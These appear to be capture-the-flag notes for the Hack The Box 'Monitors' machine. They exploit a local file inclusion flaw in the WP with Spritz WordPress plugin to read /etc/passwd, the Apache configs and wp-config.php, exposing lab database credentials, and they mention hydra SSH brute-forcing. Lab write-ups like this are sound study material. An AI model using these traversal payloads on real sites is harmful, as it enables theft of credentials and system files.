4 wp with spritz exploit

Using https://www.exploit-db.com/exploits/44544

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
| also works http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

# LFI works, RFI is failing; .php file is viewed not running.
# cant figure out where is wp-config.php
| tried /var/www/html; /var/ww/; /var/www/html/monitors/ and lot of combinations

# reading apache config file to get more idea
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/apache2.conf
[truncated]
<Directory />
	Options FollowSymLinks
	AllowOverride None
	Require all denied
</Directory>
<Directory /usr/share>
	AllowOverride None
	Require all granted
</Directory>
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride None
	Require all granted
</Directory>
#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>

<FilesMatch "^\.ht">
	Require all denied
</FilesMatch>

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# reading vhost config file to get directory information
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/etc/apache2/sites-available/000-default.conf
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf
<VirtualHost *:80>
	ServerAdmin admin@monitors.htb
	DocumentRoot /var/www/html
	Redirect 403 /
	ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
	UseCanonicalName Off
</VirtualHost>

# there is a new subdomain cacti-admin.monitors.htb
| added to /etc/hosts

# we know its /var/www/html bnut wp-config.php does not load
| tried php b64 wrapper, there's a directory whose name is not known
| using directory traversal to get config.php

# 3 directories back, makes sense
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );

# possible usernames
admin
wpadmin
marcus

# pass
BestAdministrator@2020!

# hydra ssh brute > nothing
# tried all creds on wp-login > nothing

# exploring new sub-domain

Last updated